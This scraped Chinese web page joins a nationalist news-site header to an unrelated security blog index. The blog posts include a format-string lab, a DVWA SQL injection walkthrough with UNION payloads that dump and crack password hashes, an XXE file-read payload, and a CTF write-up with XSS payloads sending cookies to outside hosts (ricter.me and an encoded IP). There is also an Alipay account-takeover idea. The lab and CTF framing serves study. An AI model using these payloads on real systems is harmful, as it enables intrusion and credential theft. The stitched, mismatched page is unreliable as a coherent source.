如您方便请把红德智库首页（）添加到收藏夹里或是分享到朋友圈里，星星之火亦能燎原，让我们一起来弘扬正能量，共同见证中华民族的伟大复兴！
：/a/hantangguilai/
红德看新闻
NEW ARTICLE
人民 &&04-28 22:11
人民 &&04-28 21:30
人民 &&04-28 21:11
环球 &&04-28 21:10
环球 &&04-28 21:02
人民 &&04-28 20:49
人民 &&04-28 20:45
人民 &&04-28 20:40
人民 &&04-28 19:37
人民 &&04-28 19:21
人民 &&04-28 19:20
人民 &&04-28 19:19
人民 &&04-28 18:34
环球 &&04-28 18:02
人民 &&04-28 17:10
人民 &&04-28 17:05
人民 &&04-28 17:04
人民 &&04-28 17:02
人民 &&04-28 17:02
人民 &&04-28 17:01
人民 &&04-28 16:38
环球 &&04-28 16:25
环球 &&04-28 16:25
人民 &&04-28 16:19
环球 &&04-28 16:18
环球 &&04-28 16:17
环球 &&04-28 16:17
人民 &&04-28 16:07
人民 &&04-28 16:07
环球 &&04-28 16:07
HOT ARTICLE
东方评论 &&04-02 11:48
东方简评：警惕亚力山大的安倍“想跑路”，再次下台、翘课
东方评论 &&03-25 15:03
东方简评：小日本玩“小聪明”终将“吃大亏”
东方评论 &&03-17 15:51
东方简评：关于缅甸问题谈话|
东方评论 &&03-29 10:31
东方评论 &&03-28 09:57
东方简评：“木马”已经“精确植入”，土耳其已然是只“肉鸡”！|
东方评论 &&04-19 08:15
东方：望大家真正理解“在西方实质性消化俄罗斯本身之前，中国是唯一有资本掀桌子的一方”
东方评论 &&04-11 08:05
东方评论 &&04-13 07:56
东方评论 &&04-08 15:49
东方评论 &&04-13 07:54
东方评论:你说要掀桌子，那我就做好准备掀桌子
东方评论 &&03-10 16:24
东方评论 &&03-22 14:25
东方简评：菲律宾在这个时间点，在南海方向再玩“旋转门”的目的是什么？
东方评论 &&04-25 08:02
东方评论 &&03-20 17:36
东方评论 &&04-06 23:58
东方评论 &&04-18 07:53
东方评论 &&04-12 08:19
东方评论 &&02-23 12:30
东方评论 &&03-21 12:39
东方评论：J20“横空出世”与“慢慢出现”的玄妙之处
东方评论 &&03-14 10:36中国菜刀 | 中国制造, 黑客之刀 | 第64页
&百度贴吧没考虑点击劫持防御，可造成恶意刷粉丝。
估计很多地方都没考虑，还可以继续挖。
本条目发布于。属于分类。作者是。
为什么中国骇客都没有本性性打破？
深蓝 (我们不是骇客，我们是骇客。) |
本条目发布于。属于分类。作者是。
一、 实验描述
格式化字符串是由像printf(user_input)这样的代码引起的，其中user_input是用户输入的数据，具有Set-UID root权限的这类程序在运行的时候，printf语句将会变得非常危险，因为它可能会导致下面的结果：
1.使得程序崩溃
2.任意一块内存读取数据
3.修改任意一块内存里的数据
最后一种结果是非常危险的，因为它允许用户修改set-UID root程序内部变量的值，从而改变这些程序的行为。
本实验将会提供一个具有格式化漏洞的程序，我们将制定一个计划来探索这些漏洞。
二、实验预备知识讲解
2.1 什么是格式化字符串？
printf (&The magic number is: %d&, 1911);
试观察运行以上语句，会发现字符串&The magic number is: %d&中的格式符％d被参数（1911）替换，因此输出变成了&The magic number is: 1911&。 格式化字符串大致就是这么一回事啦。
除了表示十进制数的％d，还有不少其他形式的格式符，一起来认识一下吧~
（ * %n的使用将在1.5节中做出说明）
2.2 栈与格式化字符串
格式化函数的行为由格式化字符串控制，printf函数从栈上取得参数。
printf (&a has value %d, b has value %d, c is at address: %08x n&,a, b, &c);
2.3 如果参数数量不匹配会发生什么？
如果只有一个不匹配会发生什么？
printf (&a has value %d, b has value %d, c is at address: %08x n&,a, b);
1，在上面的例子中格式字符串需要3个参数，但程序只提供了2个。
2，该程序能够通过编译么？
&⑴printf()是一个参数长度可变函数。因此，仅仅看参数数量是看不出问题的。
&⑵为了查出不匹配，编译器需要了解printf()的运行机制，然而编译器通常不做这类分析。
&⑶有些时候，格式字符串并不是一个常量字符串，它在程序运行期间生成(比如用户输入)，因此，编译器无法发现不匹配。
3,那么printf()函数自身能检测到不匹配么？
&⑴printf()从栈上取得参数，如果格式字符串需要3个参数，它会从栈上取3个，除非栈被标记了边界，printf()并不知道自己是否会用完提供的所有参数。
&⑵既然没有那样的边界标记。printf()会持续从栈上抓取数据，在一个参数数量不匹配的例子中，它会抓取到一些不属于该函数调用到的数据。
4,如果有人特意准备数据让printf抓取会发生什么呢？
2.4 访问任意位置内存
1，我们需要得到一段数据的内存地址，但我们无法修改代码，供我们使用的只有格式字符串。
2，如果我们调用 printf(%s) 时没有指明内存地址, 那么目标地址就可以通过printf函数，在栈上的任意位置获取。printf函数维护一个初始栈指针,所以能够得到所有参数在栈中的位置
3，观察: 格式字符串位于栈上. 如果我们可以把目标地址编码进格式字符串，那样目标地址也会存在于栈上，在接下来的例子里，格式字符串将保存在栈上的缓冲区中。
int main(int argc, char *argv[])
char user_input[100];
... ... /* other variable definitions and statements */
scanf(&%s&, user_input); /* getting a string from user */
printf(user_input); /* Vulnerable place */
4，如果我们让printf函数得到格式字符串中的目标内存地址 (该地址也存在于栈上), 我们就可以访问该地址.
printf (& x10 x01 x48 x08 %x %x %x %x %s&);
5， x10 x01 x48 x08 是目标地址的四个字节， 在C语言中,
x10 告诉编译器将一个16进制数0&10放于当前位置（占1字节）。如果去掉前缀 x10就相当于两个ascii字符1和0了，这就不是我们所期望的结果了。
6，%x 导致栈指针向格式字符串的方向移动（参考1.2节）
7，下图解释了攻击方式，如果用户输入中包含了以下格式字符串
8，如图所示，我们使用四个%x来移动printf函数的栈指针到我们存储格式字符串的位置，一旦到了目标位置，我们使用％s来打印，它会打印位于地址0&的内容，因为是将其作为字符串来处理，所以会一直打印到结束符为止。
9，user_input数组到传给printf函数参数的地址之间的栈空间不是为了printf函数准备的。但是，因为程序本身存在格式字符串漏洞，所以printf会把这段内存当作传入的参数来匹配％x。
10，最大的挑战就是想方设法找出printf函数栈指针(函数取参地址)到user_input数组的这一段距离是多少，这段距离决定了你需要在%s之前输入多少个%x。
2.5 在内存中写一个数字
%n: 该符号前输入的字符数量会被存储到对应的参数中去
printf (&12345%n&, &i);
1，数字5（%n前的字符数量）将会被写入i 中
2，运用同样的方法在访问任意地址内存的时候，我们可以将一个数字写入指定的内存中。只要将上一小节(1.4)的%s替换成%n就能够覆盖0&的内容。
3，利用这个方法，攻击者可以做以下事情:
重写程序标识控制访问权限
重写栈或者函数等等的返回地址
4,然而，写入的值是由%n之前的字符数量决定的。真的有办法能够写入任意数值么？
用最古老的计数方式， 为了写1000，就填充1000个字符吧。
为了防止过长的格式字符串，我们可以使用一个宽度指定的格式指示器。(比如（%0数字x）就会左填充预期数量的0符号)
本条目发布于。属于分类。作者是。
环境：dvwa1.7数据库：mysql前置知识：sql语句(Click me)&&&&& 在进行sql注入前，我们先熟悉熟悉select语句。一、打开我们的sql终端
二、进入之后可以看到有mysql&我们输入sql语句，即可返回我们想要的结果，注意分号哟！我们使用的dvwa，在我们前几章设置的时候，会在数据库中生成一个dvwa的database；这里我们使用它来进行我们的select 语句：（1）使用dvwa数据库（2）在users表里查询用户名为&admin&的所有信息select * from users where user='admin';上面有三个要点，[1] '*':通配符表示匹配所有内容，也就是来者不拒[2] 'where':关键字作为条件限定。[3] 在数据库中字符串时一般由单引号包住的在这里，select是从数据库检索数据的（3）我们来看一下select语句另外一面，其实它相当于我们编程语言的输出语句。不信，我们来看看哈！select 'hello world!';（4）倘若我们有多个数据要输出怎么办，这个时候可以使用&,&来分隔每个内容。如：select user,user_id from users where user='admin';
扩展当我们想要像上面只是输出多项数据，而不是检索数据的时候select 'hello','world';select 1,2,3;（5）union 联合就是将union前面那堆数据，和后面那堆数据放在一起，以便能在一个表显示。注意什么叫放在一起呢？请看例子：select 1,2,3 union select 4,5,6;解析，我们知道select 1,2,3是输出三个数字，分别为1,2,3。后面的select也是一样输出3个数字。要是后面的输出的数据数目不一致，那么则会导致下列的错误The used SELECT statements have a different number of columns
而这个则是我们之后进行sql注入的一个点（6）我们接着继续来学习一个内容order by，这个是让我们检索出来的数据进行升序或者降序排列的。select user,user_id from在这里我们，介绍一个概念就是&字段&。字段也就是一个表里面的数据列，每一个字段表示一列。如我们这里，我们select语句检索user,user_id两个数据列。当我们使用order by user的时候，会根据user数据列的的每一个数据的来进行排序，默认是升序asc。我们看一下select user,user_id from users order by user_可以看到user_id的顺序是递增的。要是递减的话，可以使用desc。
这里还有一个小tips就是：& 我们除了使用字段名来作为order by的条件外，还可以使用数字。& 1、表示的第一个字段& 2、表示的第二个字段& 如此类推就可以了，但是当不存在那个字段的时候，就会产生这样的错误。& unknown column name xx好了，到这里。我们这次需要的sql知识够了。下面我们开始我们的注入之旅三、&兔崽子mysql,看见你的尾巴了，还跑！&设置：&& 我们把安全等级调整为low，先来让自己获得点信心，免得一来就被打脸。1、测试和分析页面的功能我们可以看到这里有一个输入框，根据上面的提示是，输入用户的id。然后我们输入之后，发现它返回了关于这个user的信息！这里我们输入&1&
这里可以看到它返回三行数据，一行是我们输入的用户ID。一行是用户名，另外一行是用户别名。
同时，我看一下浏览器的地址栏那里，可以发现url成这样了http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
我们可以看到这里有个id=1的东东，是不是就是我们输入的user id呢？这里我们输入&2&，发现url变成了http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#好了，到这里，我们可以得出这里穿进去的id的值使我们可控的。我们输入的什么，则会通过id传进去！2、对id这个参数进行测试，查看一下它是否存在sql注入！这里我们在输入框里面输入&1'&，注意1后面有一个单引号&'&。可以发现，这里报错了。说我们的sql语句出现语法错误。
这里我们可以进行一个猜测，首先它这个id是被两个'包住的。查询语句可能像这样select firstname,surname from users where id = '1';当我们在1之后加了一个引号，则会导致单引号数目不平衡，那时查询语句如下。select firstname,surname from users where id = '1'';可以看到最后一个引号没被闭合，那我们该怎么办呢？这个时候有好几种办法，（1）我们在原来的基础上再继续输入多一个引号，也就是&1''&。这时候我们看一下查询语句select firstname,surname from users where id = '1''';这时候得讲一个mysql的语法，
在where语句中，当出现多个字符串的时候，&=&将会选择优先级最高的一个，优先级是从左到右，依次降低的！也就是离&=&最近的一个。
我们来看几个例子。
第一个是和我们上面类似的sql查询语句
select * from users where user_id = '1''';
第二个是来阐明我们这个优先级的，
select * from users where user_id = '1''2';
可以看到，出来的结果还是和user_id=1一样。
我们再看一个长长的，
select * from users where user_id = '1''2''abc''efg';
事实胜于雄辩，可以看到结果还是和上面的一样。
（2）第二种方法是使用&#&符号来注释后面的单引号到时查询语句将会变成这样，select firstname,surname from users where id = '1'#';（3）第三种方法是使用&– &，这里注意了&–&后面有一个空格。在url当中，我们需要使用&+&来代替&–&后面的空格。到时查询语句将会变成这样，select firstname,surname from users where id = '1'– ';好了，我们回到我们的测试页面。发现出来的结果和输入1一样。到这里我们可以知道了[1]漏洞的参数是&id&[2]漏洞的类型是字符型3、好了，我们在确认漏洞之后，需要进行构造payload了。什么是payload?就是一段恶意代码，以便我们能够获得数据里面的数据。（1）分析字段数基本的话，他也是有两种方法的[1]分析字段数的原因是我们之后需要用union select语句获得我们需要的敏感数据。那么，这里，我留下一个问题：为什么我这里能够猜想到用union的办法来获得数据呢？（提示：这个页面的功能的是什么？）根据上面我们的order by知识知道，要是后面跟着的数字超出了字段数的时候，则会报错！通过这个我们可以确定字段数。我们构造的payload如下：1' order by 1#1' order by 2#1' order by 3#当输入到3的时候，发现它报错了。也就是字段数为2
[2]第二种方法就是直接用union select来猜测字段数，因为当字段数不对应的时候，它也是会发生报错的！1' union select 1#1' union select 1,2#1' union select 1,2,3#可以发现，当union select 1,2的时候没有报错，也就是字段数为2。同时，我们也应该注意到，好像返回的内容多了三条数据，这是啥呢？
这就是我们我们union select出来的数据了。我们获取数据的信息，就通过将1,2换成数据的信息，这样通过查看页面，我们便可以获得了！Tips:当字段数较少的时候无所谓，字段数一多起来，你就傻了。下一节课的hack with python。我们将会编写脚本去做这些无谓的工作（2）字段数为2，也就是select出来的数据列有两列。也就是我们可以通过union select出两个数据。好了我们来获得关于我们的信息吧！1、获取当前数据库名字，当前用户名1' union select database(),user()#这里解释一下，database()将会返回当前网站所使用的数据库名字，user()将会返回进行当前查询的用户名。好的，这里我们看到当前数据库为:dvwa当前用户名:root@localhost
类似的函数：version() 获取当前数据库版本Tips:有时候，后面的select语句会限制输出的行数，通过limit 1，所以我们一般来说，都会让原数据库查询无效，也就是输入无效的id。如下：-1' union select database(),user()#这样就只会返回我们的数据了2、好了我们的目的的是获取当前的用户表，所以继续构造payload。根据上面的信息，我们知道当前数据库名为dvwa。可是还不够呀！表名是什么呀？好了，是不是打算放弃了。。。。-_-|||Tips:吃根辣条冷静一下，我们想想哈，当你上小学的时候，有不懂的字肿么办？& 答：有新华字典呀，你妹！那么mysql有没有类似新华的字典的东东呢？答案是有的它的这本新华字典叫做information_schema，是一个包含了my所有信息的新华字典，有啥关于数据库的信息不知道问它没问题！它本质上还是一个database，存着其他各个数据的信息。在其中，有一个表长成这样tables。有一个表长这样columns。是不是有点感觉了？是的，tables这个表存的是关于数据库中所有表的信息，他有个字段叫table_name，还有个字段叫做table_schema。其中table_name是表名，table_schema表示的表所在的数据库。对于columns，它有column_name,table_schema,table_name这里回想一下，我们拥有的消息是数据库名。也就是说我们可以构造这样的payload-1' union select table_name,2 from information_schema.tables where table_schema= 'dvwa'#你是不是想问，information_schema.tables是啥呢？information_schema不就使我们的新华字典咯！这里我们使用一种语法，&数据名.表名&tables就相当于我们新华字典的目录，table_name是tables里面的字段。语句的意思就是，这里是一本新华字典帮我把数据库名为&dvwa&这个偏旁部首的字(表名)找出来。
可以看到，(д)b，好多数据呀！我们对那个感兴趣呢？？当然，是users表啦！那之后呢？不是说还有一个columns表么？
那我们需要什么？需要table_name以及table_schema
那我们查什么呢？column_name
这次我们的构造的payload如下-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'#这里说一下，倘若不指定数据库名为'dvwa'，若是其他数据里面也存在users表的话，则会有很多混淆的数据。
又来了，(д)b，好多数据呀！我们对那个感兴趣呢？？当然是user,password啦！两个字段刚刚好好的，我们再次修改payload-1' union select user,password from users#
Binggo!我们注出所有用户名和密码值，等等！这密码好像有点奇葩，数一数，32位！这里的密码是经过md5加密的，好不容易注入出管理账号和密码，但是密码加密了没办法了吗？不一定！Tips:小子，谁叫你遇上了我呢！看我乾坤大挪移这个时候，我们需要找一些md5的网站，来进行破解！好了，我比较喜欢的是这个Click好，我们这里选择的是pablo的这个进行破解，md5密文为：0d107d09f5bbe40cade3de5c71e9e9b7
可以看到密码已经被破解出来了，密码是&letmein&,我们验证一下！看，这个时候我们已经成功登陆了！
本条目发布于。属于分类。作者是。
狂刷优惠券5000万-7000万！苏宁易购一路逻辑支付马脚招致的重年夜乌龙事宜？
苏宁易购哭瞎在路上，中国有史以来最年夜“砍单事宜”或将演出
本条目发布于。属于分类。作者是。
&SpringMVC框架支持XML到Object的映射，内部是使用两个全局接口Marshaller和Unmarshaller，一种实现是使用Jaxb2Marshaller类进行实现，该类自然实现了两个全局接口，用来对XML和Object进行双向解析。并且XML文件可以是DOM文档、输入输出流或者SAX&handler。
SpringMVC流行使用注解来快速开发，其中JAXB注解可以对JavaBean中需要与XML进行转化的地方进行标注。比如，实现XML文件到User对象的映射，User对象中使用JAXB注解：
当在SpringMVC中使用JAXB实现XML与Java&Bean映射的时候，可能会导致XXE，因为SpringMVC中也可以解析request&body中的XML，其原理是在注解模式下，使用注解@RequestBody后，可以将HTTP请求的请求体引入到我们的Controller的方法中，一般是作为方法的参数来使用。在开启annotation-driven的时候，HttpMessageConverter会给AnnotationMethodHandlerAdapter初始化7个转换器。至于Spring是如何选择合适的转换器的，这里没有读，猜测应该是通过Accept或者Content-type头来进行判断的。
如果应用程序没有做有效的处理，那么通过构造request&body，我们可以实现外部实体的注入。比如，Web应用中使用XML传递数据时，没有对外部实体的引用做限制，就可能导入外部实体，导致任意文件读取。
在测试漏洞中，只需要在配置文件中对注解驱动与ViewResolver进行配置即可，
正常请求时：
在请求中标明提交一个application/xml类型的内容，并在request&body中提交一个XML，内容为name=exploit。提交请求，转向页面index.，当然，在controller中我们做了一些处理，将转换的user传给了jsp来呈现，代码为：
可以看到，控制台上打印了toString方法的内容：
index.jsp结果如下：
下面引入外部实体，提交：
[]&view plaincopy&
&?xml&version=&1.0&&encoding=&UTF-8&?&&& &!DOCTYPE&ANY[&&
&!ENTITY&shit&SYSTEM&&&file:///c:/1.txt&&]&&& &user&&name&&&/name&&/user&&&
这里与上面不同，引入了一个恶意的外部实体shit，并且在回显的位置&name&中使用这个实体，效果是读取c盘下面的1.txt，内容为一串&2&，结果如下：
本条目发布于。属于分类。作者是。
0×00 Cake
Cake 是一题 Android 题，具体流程就是一个输入一个字符串然后，初始化一个长度为16的数组，然后将字符串与这个数组 xor 。所以我们只需要再 xor 一下就 ok 了。
就是看代码逆向下，关键是有两个 Key 找对就 ok 直接上代码
a = [0, 3, 13, 19, 85, 5, 15, 78, 22, 7, 7, 68, 14, 5, 15, 42]
b = 'bobdylan'
s = ''
for x in a:
s+= chr(x ^ ord(b[i % len(b)]))
0×01 渗透绕过WAF1
2、绕过云 WAF1 是一题绕过 WAF 题，这个 WAF 写的很死，所以就要用其他办法咯～
通过打开的弹窗提示，需要在.的子域下面做，于是 fuzz 子域名：
得出，打开发现没有 waf，注入点为id。
0×02 前端初赛题1
反射型 XSS，通过 ph 牛的文章，标签内的内容可以 HTML encode，成功弹窗。
之后 payload 如下：
var i = new Image();
i.src = &http://ricter.me:9999/?& + document.
得到 flag。
0×03 密码宝宝
密码宝宝 一题逆向题，用了 upx 加壳。
用010editor打开后，可以看到加了upx壳，用upx &d脱壳
在ida中查找GetWIndowTextA调用的地方
Sub_405160这个函数就是进行判断的函数
可以看到逻辑比较简单，就是将&himemnl&的每一位与0x4c,0x5a,0x4b各异或一次，就可以得到密码&5408031&
0×04 简单业务逻辑
简单业务逻辑 一题逻辑题～
注册账号，其中 Username 为Admin。
登录后买 -111 个草泥马：
得到好多钱，然后买最贵的那个。
0×05 前端初赛题2
前端初赛题2 简单来说就是给你一个 flash 让你弹弹弹
直接反编译得到 as 代码，首先可以知道 ExternalInterface.call 肯定是利用电，但是发现它会 delete 掉那些方法。找资料发现
/papers/948
如果你需要将你的vector发送到藏在防火墙的后面受害者（flashvars&可以使用#来达到隐藏自己的目的）又或者想突破一些客户端的XSS防御机制这个方法将会十分的凑效。这一切都基于flash会丢弃一些被URL编码过的无效字符。
(1)flash会丢弃两个出现在%后面的无效十六进制字符（([^0-9a-fA-F])），比如：
&%X& or &%=&
(2)如果在%后面出现一个有效和一个非有效十六进制字符，就会丢弃三个字符，比如：
&%AX& or &%A&&
这样处理后就能 bypass 那个 delete 了，因为在 for 里时把 %X 带上了，最后在 call 的时候 flash 会丢弃这个
然后在用这篇文章里的方法
/tips/2924
alert(1))}catch(e){alert(100)}//
当然直接用弹不出来（血的教训，卡了好久，审查元素看了下发现语句不一样＝。＝ 所以最后可以这样弹
%Xdebug= %22));alert(1);}catch(e){alert(100)}//
最后 payload 如下
/swf.swf?%Xdebug= %22));eval(String.fromCharCode(101,118,97,108,40,34,118,97,114,32,120,61,110,101,119,32,73,109,97,103,101,40,41,59,120,46,115,114,99,61,39,104,116,116,112,58,47,47,52,53,46,53,53,46,49,51,53,46,49,51,57,47,120,46,112,104,112,63,99,111,111,107,105,101,61,39,43,101,115,99,97,112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,34,41));}catch(e){alert(100)}//
0×06 渗透绕过WAF2
绕过云WAF2 题目显示说不在内网，所以第一步就是先设置一个内网 ip 咯 接下来看 writeup
提示需要内部访问，于是 fuzz IP：
192.168.x.x
172.16.x.x
发现 10 开头的 IP 可以访问。通过更改 HTTP 请求方法为 PATCH 可以让防护等级为中。
更改关键字，如%20改为%0b等绕过检测，注入得到 flag。
本条目发布于。属于分类。作者是。
分享一个自己写的telnet获取wifi密码的剧本及WEB
一只猿 (我是山公派来的彩笔) |
本条目发布于。属于分类。作者是。
安全研究人员今天发布了一个中危&&任意文件上传漏洞（CVE-）。
在上传文件的时候只判断文件名是合法的文件名就断定这个文件不是恶意文件，这确实会导致其他安全问题。并且在这种情况下，在你自己的文件中检查漏洞很不现实，因为这个漏洞可以绕过你对文件名后缀、文件类型(Content-Type)、Mime type、文件大小等的检查，所以仅仅依靠这些检查是救不了你的。
这个漏洞存在于php中一个非常常用的函数中：move_uploaded_files，开发者总是用这个函数来移动上传的文件,这个函数会检查被上传的文件是否是一个合法的文件(是否是通过 HTTP 的 post 机制上传的)，如果是合法的文件，则将它一定到指定目录中。
move_uploaded_file ( string $filename , string $destination )
这里的问题是，可以在文件名中插入空字符(之前多次修复过这个漏洞，比如CVE-)，利用插入空字符的方式，攻击者可以上传任意文件，引起远程代码执行漏洞等。
我这里用DVWA来演示这个例子，DVWA级别最高的一题中因为种种原因不是很容易通过，意在告诉开发者如何去开发更安全的文件上传组件。让我们来看看这个例子：
本条目发布于。属于分类。作者是。
简要描述：
阿里小号的手机号中，存在部分号码是会存在注册了支付宝账号或其他互联网账号的情况，当使用小号的手机号作为手机号去支付宝做密码找回时，可以发现手机是否注册，若是注册可以进一步重置账号密码和支付密码。
阿里了小号每个月提高三个免费的号码使用，若是我搞十个小号就每个有就有30个账号使用。这时再去尝试各大电商！！！哈哈哈！！！
作为一名穷潘浚没有钱买多部手机，在注册账号时老是泄露我的手机号码。。。。
当发现阿里小号的时候，立刻就买了个号码。。
但最近老是收到一些快递通知。。
结果去支付宝试试。。。发现居然可以重置小号的密码…这可就乐了。
看来阿里小号整个安全需要考虑下了，现在有明文规定&信息被泄露&是不合法的哦！
本条目发布于。属于分类。作者是。
Recent Posts